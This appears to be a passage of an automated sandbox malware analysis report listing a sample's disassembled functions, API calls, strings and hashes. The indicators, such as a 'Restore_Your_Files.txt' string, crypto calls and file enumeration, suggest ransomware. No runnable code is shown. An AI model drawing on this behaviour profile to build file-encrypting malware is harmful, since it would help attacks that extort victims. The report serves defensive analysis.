                                      • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,BA3649C5), ref: 008CF785
                                      • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,BA3649C5), ref: 008CF7A4
                                      • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,BA3649C5), ref: 008CF7BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Path$Network$CreateSemaphore$Ios_base_dtorstd::ios_base::_
                                      • String ID: X$\Restore_Your_Files.txt
                                      • API String ID: 3524565764-1189399128
                                      • Opcode ID: ab31f94c467c4d951b58097ceb7ef2ce757b279666bc3e7092ac99e5e10dea57
                                      • Instruction ID: 583c6fdc52dfebbaab5802c6422010bc79bf5d15c0ae38c7090a4591647a7cfa
                                      • Opcode Fuzzy Hash: ab31f94c467c4d951b58097ceb7ef2ce757b279666bc3e7092ac99e5e10dea57
                                      • Instruction Fuzzy Hash: BF62BD71E002589BDF14DB68C985BDDBBB5FF45304F6441ADE809A7282DB70AE84CF91
                                      Function 009442F5 Relevance: 10.8, APIs: 7, Instructions: 284COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 009443F8
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00944444
                                        • Part of subcall function 00945B3D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00945C30
                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 009444B0
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 009444CC
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00944520
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0094454D
                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 009445A3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                      • String ID:
                                      • API String ID: 2943730970-0
                                      • Opcode ID: 6d7c8e8a7410346e870b3ff2d89b5e35572235ac21958dae223f2bb758a4484d
                                      • Instruction ID: 7d23af7a45cd5c079f2946f2561caef6e3cb60bcc9d5622068dd91645e8eb72b
                                      • Opcode Fuzzy Hash: 6d7c8e8a7410346e870b3ff2d89b5e35572235ac21958dae223f2bb758a4484d
                                      • Instruction Fuzzy Hash: A8B16CB0A01615AFDB18CF68C981B7AB7F8FF44300F24816EE805AB295D734ED91CB90
                                      Function 00981304 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: 020462869ab2dad9c2007924ace91491f10c3c730b5bdcba2a6e7572f42d91ca
                                      • Instruction ID: 6f0ee91f25cb78c7914e2c6634cfd0a3536999155fb1e7b445e1f5c99a0153b4
                                      • Opcode Fuzzy Hash: 020462869ab2dad9c2007924ace91491f10c3c730b5bdcba2a6e7572f42d91ca
                                      • Instruction Fuzzy Hash: 4CC24B71E086298FDB25DF28DD407E9B7B9EB84304F1545EAD84DE7241E778AE828F40
                                      Function 0095357D Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 009535B6
                                        • Part of subcall function 0094D317: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0094D338
                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0095361C
                                      • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00953634
                                      • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00953641
                                        • Part of subcall function 009530E1: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00953109
                                        • Part of subcall function 009530E1: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 009531A1
                                        • Part of subcall function 009530E1: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 009531AB
                                        • Part of subcall function 009530E1: Concurrency::location::_Assign.LIBCMT ref: 009531DF
                                        • Part of subcall function 009530E1: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 009531E7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                      • String ID:
                                      • API String ID: 2363638799-0
                                      • Opcode ID: 71b42c97c1e2fbb32730085475a073b3437bf9dbc9830c7f0946d127fa25da5a
                                      • Instruction ID: 5d45b31f7476e57f5c394e857dcfd150afee07cef57c9c1855c17abde6b409e8
                                      • Opcode Fuzzy Hash: 71b42c97c1e2fbb32730085475a073b3437bf9dbc9830c7f0946d127fa25da5a
                                      • Instruction Fuzzy Hash: A451A131A01205ABCF14DF55C896BAEB775AF48755F158069ED027B392CB30AF09CBA1
                                      Function 0097F46E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0097F78D,?,00000000), ref: 0097F507
                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0097F78D,?,00000000), ref: 0097F530
                                      • GetACP.KERNEL32(?,?,0097F78D,?,00000000), ref: 0097F545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: 3df8075ae14dacc28e5afb7147bf593a9d67e889672c72181525ec7fa7e0e2c4
                                      • Instruction ID: a40a57128dc93db82afe1b0ebf660f795574bc2f691caf7bcf9b3ef74712fc2a
                                      • Opcode Fuzzy Hash: 3df8075ae14dacc28e5afb7147bf593a9d67e889672c72181525ec7fa7e0e2c4
                                      • Instruction Fuzzy Hash: 69219D33B04100ABDB308F68D825AB7B3AAAB50B54B56C474F90EE7120E732DE41C390
                                      Function 0097F642 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BD8
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BE5
                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0097F74E
                                      • IsValidCodePage.KERNEL32(00000000), ref: 0097F7A9
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0097F7B8
                                      • GetLocaleInfoW.KERNEL32(?,00001001,00971475,00000040,?,00971595,00000055,00000000,?,?,00000055,00000000), ref: 0097F800
                                      • GetLocaleInfoW.KERNEL32(?,00001002,009714F5,00000040), ref: 0097F81F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID:
                                      • API String ID: 745075371-0
                                      • Opcode ID: d6b16e532749f485744b184df75259b31496cda4d4208b0f7acf79e3e1d72972
                                      • Instruction ID: 62f7df14371132769a50d818d1524b3cf4a0274cef99df8fb71d1c0792e46cb6
                                      • Opcode Fuzzy Hash: d6b16e532749f485744b184df75259b31496cda4d4208b0f7acf79e3e1d72972
                                      • Instruction Fuzzy Hash: 5B513F73A04609ABDF24EFA5CC55ABA77B8BF44700F148476E518EB191E7709A04CB61
                                      Function 00914B90 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 263encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000010,BA3649C5,75B4FC30,?), ref: 00914BE0
                                      • CryptReleaseContext.ADVAPI32(00000001,00000000,?,00000000,?,009962DC,00000002, operation failed with error ,0000001D,?,?,OS_Rng: ,00000008,?), ref: 00914F10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ContextCryptErrorLastRelease
                                      • String ID: operation failed with error $OS_Rng:
                                      • API String ID: 3299239745-700108173
                                      • Opcode ID: fe47ca4ca2892e53f4a439079b74bc490e76aeaa3f1c1b39d599d2866cd505d2
                                      • Instruction ID: 27f42280a9ce9c8e031397746e9259831decd447433f2cbe4f8a8100a4b47d1d
                                      • Opcode Fuzzy Hash: fe47ca4ca2892e53f4a439079b74bc490e76aeaa3f1c1b39d599d2866cd505d2
                                      • Instruction Fuzzy Hash: 1AA1B471A102599FEB14CF68CD45BDDBBB5FF49304F108259E004AB292DB75AAC4CF61
                                      Function 008B5330 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 247COMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,BA3649C5), ref: 008B53FE
                                      • ReleaseSemaphore.KERNEL32(?,00000001,762330DF,BA3649C5), ref: 008B54D9
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 008B55E6
                                      Strings
                                      • boost shared_lock has no mutex, xrefs: 008B5554
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ObjectReleaseSemaphoreSingleWait___std_exception_destroy
                                      • String ID: boost shared_lock has no mutex
                                      • API String ID: 1459948668-3890706923
                                      • Opcode ID: 4ee2574f6a088f828b4605ae0d1220b3c7617b68b95c2dd778d93adf2e9473f3
                                      • Instruction ID: 69675210fc38e70b80d9026a26162ca9a91c325f7abea2aadff9b617fe8ca135
                                      • Opcode Fuzzy Hash: 4ee2574f6a088f828b4605ae0d1220b3c7617b68b95c2dd778d93adf2e9473f3
                                      • Instruction Fuzzy Hash: 5C81EEB1900A099BCB28DF58C952BFEB7A1FF44314F24416DE91AE7391DB74AE04CB90
                                      Function 008C8B70 Relevance: 6.3, APIs: 4, Instructions: 349fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5,00000000,?,00000000), ref: 008C8CD3
                                      • FindFirstFileW.KERNEL32(?,?,009AFBF8,00000002,009AFBF4,?,?,?), ref: 008C8D2F
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5), ref: 008CB78D
                                      • FindFirstFileW.KERNEL32(?,?,009AFBF8,00000002), ref: 008CB7B5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorFileFindFirstMode
                                      • String ID:
                                      • API String ID: 3909587737-0
                                      • Opcode ID: 0ce2daa0fd04f4429fb48029616988e98ae09a3c9b473f64afe972e81eeeb280
                                      • Instruction ID: 2927a77c535af2691f3ef7567fa917e68efc13af1cd7c32eb1d1149f81da180c
                                      • Opcode Fuzzy Hash: 0ce2daa0fd04f4429fb48029616988e98ae09a3c9b473f64afe972e81eeeb280
                                      • Instruction Fuzzy Hash: B1C1BF71A00109DBCB18DF68CC85BAEB7B5FB84314F50866DE819DB691DB34EA85CB90
                                      Function 0097ED0A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0097147C,?,?,?,?,00970ED3,?,00000004), ref: 0097EDEC
                                      • _wcschr.LIBVCRUNTIME ref: 0097EE7C
                                      • _wcschr.LIBVCRUNTIME ref: 0097EE8A
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0097147C,00000000,0097159C), ref: 0097EF2D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID:
                                      • API String ID: 4212172061-0
                                      • Opcode ID: 8aafb2f0ea732676e39f532c69302dc85d77a51ff5cfc33d2504fe6f94f3ad85
                                      • Instruction ID: 16bef208334bf2368063a2b29622c47574605c2681546120900ecf2ad4c5bfd1
                                      • Opcode Fuzzy Hash: 8aafb2f0ea732676e39f532c69302dc85d77a51ff5cfc33d2504fe6f94f3ad85
                                      • Instruction Fuzzy Hash: 3C61C673600206AAD724AB75DC46FB677ACEF4C710F1484AAF90DD7191EB74ED4087A0
                                      Function 0091E190 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 584COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0091E8CD
                                      Strings
                                      • TableSize, xrefs: 0091E228
                                      • : block size of underlying block cipher is not 16, xrefs: 0091E89E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: : block size of underlying block cipher is not 16$TableSize
                                      • API String ID: 2005118841-2295039505
                                      • Opcode ID: cd43bde7868cb98808c74be34a2de00bfab660419ab29fb272562386a167f911
                                      • Instruction ID: 76f3170b25934df85440c86ed51b7131fdb2c9918a6e3635a878f457ff8ca20f
                                      • Opcode Fuzzy Hash: cd43bde7868cb98808c74be34a2de00bfab660419ab29fb272562386a167f911
                                      • Instruction Fuzzy Hash: 0132F7B5E042198FDB24CF69C844B9DF7B5BF98304F25866ED819A7352DB70A981CF80
                                      Function 00914F60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00914FF0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0091507A
                                      • CryptGenRandom.ADVAPI32(00000000,?,?,BA3649C5), ref: 00914F9A
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00914FE9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Crypt$ContextException@8RandomReleaseThrow
                                      • String ID: CryptGenRandom
                                      • API String ID: 1047471967-3616286655
                                      • Opcode ID: a5d4b1172088425c396ee0d7aacc4a3aefe31f8fa305e318105d5f75d75fc131
                                      • Instruction ID: 9748f82f9b72bb4052c3354c6e6aa12d603e5084c5bae7696d488ba61a8778ef
                                      • Opcode Fuzzy Hash: a5d4b1172088425c396ee0d7aacc4a3aefe31f8fa305e318105d5f75d75fc131
                                      • Instruction Fuzzy Hash: 4E014C7194420CAFCB14EF94CC41FEEBBB8FB49720F40452AE812A7694DB74A608CB50
                                      Function 008B1020 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __onexit
                                      • String ID: Dflt$Dflt$Dflt$Dflt
                                      • API String ID: 1448380652-281602996
                                      • Opcode ID: 7ac3ef62736fbebed45c3bd7e8535261b207bc3e4af198d4059886231bac38a9
                                      • Instruction ID: 58f90009ef49bf1db0a9e28c2b034a78d2df5aea6e04d4e2e851e41d097cf787
                                      • Opcode Fuzzy Hash: 7ac3ef62736fbebed45c3bd7e8535261b207bc3e4af198d4059886231bac38a9
                                      • Instruction Fuzzy Hash: 4B113DB05AE744EBE701CF54EC1AB6A7BA4F38170CF00821AE5055B7E0C7BA1188EBD5
                                      Function 008F4680 Relevance: 4.9, APIs: 3, Instructions: 427COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F474D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID:
                                      • API String ID: 2005118841-0
                                      • Opcode ID: cf7a1f52d9df86e35662a07889472a22f76900823f1962072456a03a4686c6fd
                                      • Instruction ID: 7a59e0280f055867acd7a570bbd5293980ea868e761e41b6a417263a52f19c2a
                                      • Opcode Fuzzy Hash: cf7a1f52d9df86e35662a07889472a22f76900823f1962072456a03a4686c6fd
                                      • Instruction Fuzzy Hash: 2AF12575A00249AFCB04DFA9C884AAEBBF5FF88310F14456AF919E7351DB31AD14CB91
                                      Function 0097F0F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                      Download Yara Rule
                                      APIs
